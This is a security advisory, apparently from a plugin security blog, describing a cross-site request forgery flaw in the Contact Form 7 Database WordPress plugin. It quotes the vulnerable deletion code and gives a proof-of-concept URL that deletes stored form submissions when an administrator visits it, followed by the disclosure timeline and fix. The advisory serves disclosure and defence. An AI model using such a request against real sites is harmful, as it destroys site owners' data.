While looking over another vulnerability in the plugin Contact Form 7 Database we also noticed that it lacked protection against cross-site request forgery (CSRF) when deleting the form submissions that it stores.

The following code in the file /admin/table.php handles processing requests to delete form submissions:

129
130
131
132
133
134
135
136
137
138

// If the delete bulk action is triggered
if ((isset($_POST['action']) && $_POST['action'] == 'bulk-delete')
   || (isset($_POST['action2']) && $_POST['action2'] == 'bulk-delete')
) {
    $delete_ids = esc_sql($_POST['bulk-delete']);
 
// loop over the array of record IDs and delete them
foreach ($delete_ids as $id) {
    $this->delete_entry($id);
}

The code doesn’t check for a valid nonce, which is used to prevent CSRF.

Proof of Concept

The following proof of concept will delete the form submissions with the ID 1 and 2, when logged in as an Administrator.

Make sure to replace “[path to WordPress]” with the location of WordPress.

http://[path to WordPress]/wp-admin/admin.php?page=cf7-data&action=-1&cf7d-export=-1&del_id%5B%5D=1&del_id%5B%5D=2&action2=delete&btn_apply2=Apply

Timeline

• March 27, 2017 – Developer notified.
• April 3, 2017 – WordPress.org Plugin Directory notified.
• April 3, 2017 – Plugin removed from WordPress.org Plugin Directory.
• April 4, 2017 – Version 1.2 submitted to WordPress.org Plugin Directory’s Subversion repository, which fixes vulnerability.

Concerned About The Security of the Plugins You Use?

Plugin Security Scorecard Grade for Contact Form 7 Database

See issues causing the plugin to get less than A+ grade